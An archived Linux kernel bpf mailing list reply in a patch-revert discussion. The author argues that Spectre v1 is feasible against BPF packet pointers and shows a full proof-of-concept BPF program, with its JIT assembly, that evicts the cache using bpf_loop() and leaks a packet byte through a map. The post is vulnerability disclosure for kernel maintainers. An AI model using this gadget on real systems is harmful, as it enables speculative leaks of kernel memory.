[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20230918112549.105846-1-gerhorst@amazon.de>
Date: Mon, 18 Sep 2023 11:25:50 +0000
From: Luis Gerhorst <gerhorst@...zon.de>
To: <alexei.starovoitov@...il.com>
CC: <andrii@...nel.org>, <ast@...nel.org>, <bpf@...r.kernel.org>,
<daniel@...earbox.net>, <gerhorst@...zon.de>, <gerhorst@...fau.de>,
<hagarhem@...zon.de>, <haoluo@...gle.com>, <iii@...ux.ibm.com>,
<john.fastabend@...il.com>, <jolsa@...nel.org>,
<kpsingh@...nel.org>, <laoar.shao@...il.com>,
<linux-kernel@...r.kernel.org>, <linux-kselftest@...r.kernel.org>,
<martin.lau@...ux.dev>, <mykolal@...com>, <puranjay12@...il.com>,
<sdf@...gle.com>, <shuah@...nel.org>, <song@...nel.org>,
<yonghong.song@...ux.dev>
Subject: Re: [PATCH 2/3] Revert "bpf: Fix issue in verifying allow_ptr_leaks"
On Thu, 14 Sep 2023 12:47:16 -0700, Alexei Starovoitov wrote:
> You mean since skb_shared_info is placed after skb->end
> and in zero copy case destructor_arg may be initialized with the same
> kernel pointer for multiple skb-s ?
> The attacker cannot construct the address from data_end.
> The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END.
> But the attacker can do skb->data + X.
> The idea is that they can train the branch to mispredict with
> a large packet and then send a small one so that shared_info
> after skb->end has the same uarg pointer in all packets?
> So every skb->data+X is a different location, but all of them
> point to data that has uarg==destructor_arg ?
>
> That would be feasible in theory, but in order to speculate the loads
> the branch mispredict has to be reliable.
> The spec v1 attack requires one of two loads feeding
> into compare operation has to be slow.
> In this case both data and data_end loads are going to be fast.
> The attacker cannot evict skb->data or skb->data_end from cache.
It is true that this is not easily possible using the method most exploits use,
at least to my knowledge (i.e., accessing the same address from another core).
However, it is still possible to evict the cacheline with skb->data/data_end
from the cache in between the loads by iterating over a large map using
bpf_loop(). Then the load of skb->data_end would be slow while skb->data is
readily available in a callee-saved register.
For a CPU with 64KiB of per-core L1 cache all 64-byte cachelines can be evicted
by iterating over a 64KiB array using 64-byte increments, that's only 1k
iterations. Meanwhile, skb->data can be safe in r15 as this is not used by
bpf_loop() and bpf_map_lookup_elem(). Even evicting the L2 cache might be
possible as bpf_loop() currently has a iteration limit of 8 million. To extend
that, userspace could work on evicting the L3 cache from other cores and make
the speculation window even larger. This would of course slow the whole reading
process down, but in return you can also leak more data by indexing into the
leak-array using a full byte.
For reference, here's the full program and assembly it is jited to:
static long callback_fn(__u32 index, void *ctx) {
__u32 key = index * 8;
__u64 *value = bpf_map_lookup_elem(&evictmap, &key);
if (value) {
*value = 2 * *value;
return 0;
}
return 1;
}
SEC("tcx/ingress")
__naked void pkt_ptr(void)
{
// +76: data
// +80: data_end
asm volatile (" \
r6 = 0; \
r7 = r1; \
prepare_data_%=: \
r8 = *(u32 *)(r1 + 76); \
r9 = r8; \
r9 += 34; \
evict_loop_%=: \
w1 = 1024; \
r2 = %[callback_fn] ll; \
r3 = 0; \
*(u64 *)(r10 - 8) = r3; \
r3 = r10; \
r3 += -8; \
r4 = 0; \
call %[bpf_loop]; \
gadget_%=: \
r2 = *(u32 *)(r7 + 80); \
if r2 <= r9 goto exit_%=; \
r5 = *(u8 *)(r7 + 14); \
*(u64*)(r10 - 8) = r5; \
r2 = r10; \
r2 += -8; \
r1 = %[leakmap] ll; \
call %[bpf_map_lookup_elem]; \
if r0 == 0 goto exit_%=; \
r6 = *(u64 *)(r0 + 0); \
exit_%=: r0 = r6; \
exit; \
" :
: __imm_addr(leakmap),
__imm_addr(callback_fn),
__imm(bpf_loop),
__imm(bpf_map_lookup_elem)
: __clobber_all);
}
bpf_prog_64fe264baec539aa_pkt_ptr:
; asm volatile (" \
0: endbr64
4: nopl 0x0(%rax,%rax,1)
9: xchg %ax,%ax
b: push %rbp
c: mov %rsp,%rbp
f: endbr64
13: sub $0x20,%rsp
1a: push %rbx
1b: push %r13
1d: push %r14
1f: push %r15
21: xor %ebx,%ebx
23: mov %rdi,%r13
26: mov 0xc8(%rdi),%r14
2d: mov %r14,%r15
30: add $0x22,%r15 // data prepared
34: mov $0x2000,%edi
39: movabs $0xffffffffc01d09b0,%rsi
43: xor %edx,%edx
45: mov %rdx,-0x8(%rbp)
49: lfence
4c: mov %rbp,%rdx
4f: add $0xfffffffffffffff8,%rdx
53: xor %ecx,%ecx
55: cmp $0x800000,%rdi
5c: jbe 0x0000000000000065
5e: mov $0xfffffff9,%eax
63: jmp 0x00000000000000a2
65: mov %rbx,-0x20(%rbp)
69: mov %r13,-0x18(%rbp)
6d: mov %r14,-0x10(%rbp)
71: mov %rdi,%rbx
74: xor %r13d,%r13d
77: mov %rdx,%r14
7a: cmp %rbx,%r13
7d: jae 0x0000000000000093
7f: mov %r13,%rdi
82: mov %r14,%rsi
85: callq 0x0000000000000148
8a: add $0x1,%r13
8e: test %rax,%rax
91: je 0x000000000000007a
93: mov %r13,%rax
96: mov -0x20(%rbp),%rbx
9a: mov -0x18(%rbp),%r13
9e: mov -0x10(%rbp),%r14
a2: mov 0x50(%r13),%rsi // load data_end
a6: cmp %r15,%rsi // use of data_end and data
a9: jbe 0x00000000000000f7 // to mispredict
ab: movzwq 0x7c(%r13),%r8 // use of data
b0: shr $0x10,%r8d
b4: and $0xff,%r8d
bb: mov %r8,-0x8(%rbp)
bf: mov %rbp,%rsi
c2: add $0xfffffffffffffff8,%rsi
c6: movabs $0xffffb85680acd000,%rdi
d0: add $0x210,%rdi
d7: mov 0x0(%rsi),%eax
da: cmp $0x20000,%rax
e1: jae 0x00000000000000ec
e3: shl $0x3,%rax
e7: add %rdi,%rax
ea: jmp 0x00000000000000ee
ec: xor %eax,%eax
ee: test %rax,%rax
f1: je 0x00000000000000f7
f3: mov 0x0(%rax),%rbx
f7: mov %rbx,%rax
fa: pop %r15
fc: pop %r14
fe: pop %r13
100: pop %rbx
101: leaveq
102: retq
long callback_fn(__u32 index, void * ctx):
bpf_prog_8e1ec5bf965fdd4a_callback_fn:
; __u32 key = index * 8;
0: endbr64
4: nopl 0x0(%rax,%rax,1)
9: xchg %ax,%ax
b: push %rbp
c: mov %rsp,%rbp
f: endbr64
13: sub $0x8,%rsp
1a: shl $0x3,%edi
; __u32 key = index * 8;
1d: mov %edi,-0x4(%rbp)
20: lfence
23: mov %rbp,%rsi
;
26: add $0xfffffffffffffffc,%rsi
; __u64 *value = bpf_map_lookup_elem(&evictmap, &key);
2a: movabs $0xffffb85680a01000,%rdi
34: add $0x210,%rdi
3b: mov 0x0(%rsi),%eax
3e: cmp $0x1000,%rax
45: jae 0x0000000000000050
47: shl $0x3,%rax
4b: add %rdi,%rax
4e: jmp 0x0000000000000052
50: xor %eax,%eax
52: mov $0x1,%edi
; if (value) {
57: test %rax,%rax
5a: je 0x0000000000000069
; *value = 2 * *value;
5c: mov 0x0(%rax),%rdi
; *value = 2 * *value;
60: shl %rdi
; *value = 2 * *value;
63: mov %rdi,0x0(%rax)
67: xor %edi,%edi
; }
69: mov %rdi,%rax
6c: leaveq
6d: retq
> Remember that we rearranged 'max_entries' field in struct bpf_map
> specifically to be in the different cache line vs fields
> controlled by user space. It was the necessary part of spec v1 attack.
--
Luis
Amazon Development Center Germany GmbH
Krausenstr. 38
10117 Berlin
Geschaeftsfuehrung: Christian Schlaeger, Jonathan Weiss
Eingetragen am Amtsgericht Charlottenburg unter HRB 149173 B
Sitz: Berlin
Ust-ID: DE 289 237 879
Powered by blists - more mailing lists